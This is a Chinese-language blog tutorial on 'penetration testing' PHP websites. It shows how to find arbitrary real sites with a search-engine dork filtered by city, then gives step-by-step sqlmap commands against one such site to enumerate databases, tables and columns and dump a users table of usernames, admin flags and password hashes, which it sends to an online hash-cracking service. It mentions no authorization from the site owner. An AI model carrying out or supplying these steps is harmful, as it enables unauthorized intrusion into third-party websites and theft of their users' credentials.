0x06 PHP网站渗透测试

特殊说明:本文档以技术角度出发,勿用于非法用途。

之前我们写了关于ASP网站的渗透测试教程,本教程主要讲解PHP网站的渗透测试。

我们要查找网站地址中包含php标识的网站,从而确认网站的开发语言,我们只要在必应搜索引擎中输入“php?id”即可,我为了更准确找到指定地区的网站,我所使用的是“ “php?id” and “沈阳” ”,如下图所示:

接下来我们检测网站是否存在漏洞,我们使用的命令是:

# 检测是否存在SQL注入漏洞(这里将网址替换为XXX)
# -u 参数为后根网站URL
sqlmap -u "http://www.xxx.com.cn/Exhibition_info.php?id=29"

 

在检测结果后,如果出现操作系统及数据库信息时,说明我们找到了合适的目标,如下图所示:

web application technology: Apache 2.4.23, PHP 5.6.25为Apache与PHP的版本。

back-end DBMS: MySQL >= 5.0.12为数据库使用MySQL,高于5.2.12版本。

通过枚举的方法,来进行数据库名称的检测。

# 列出所有数据库(这里将网址替换为XXX)
sqlmap -u "http://www.xxx.com.cn/Exhibition_info.php?id=29" --dbs

 

在图中可以看出,我存在三个数据库,其中cms_aone这个库可能是我们想要的库名称,接下来对这个库进行下一步的处理,列出库中所有表信息。

# 列出表名(这里将网址替换为XXX)
sqlmap -u "http://www.xxx.com.cn/Exhibition_info.php?id=29" --tables -D "cms_aone"

 

在表中查找我们让为关键的表,进行下一步字段的枚举。

# 枚举字段(这里将网址替换为XXX)
sqlmap -u "http://www.xxx.com.cn/Exhibition_info.php?id=29" --columns -T "users" -D "cms_aone"

 

字段数据出来之后,我们就可以根据字段检测数据内容了。

# 查看指定字段内容(这里将网址替换为XXX)
sqlmap -u "http://www.xxx.com.cn/Exhibition_info.php?id=29" --dump -C "rid,uid,uisadmin,uname,upass,uquan,zt" -T "users" -D "cms_aone"

 

在图中可以看出,密码是经过加密的,我们可以到https://www.cmd5.com网站在线破解,如果是弱口令,很快就能破解出来。

 

转载请附上原文出处链接及本声明
李老师的博客 » 0x06 PHP网站渗透测试

发表评论

提供最优质的文章集合

立即查看 了解详情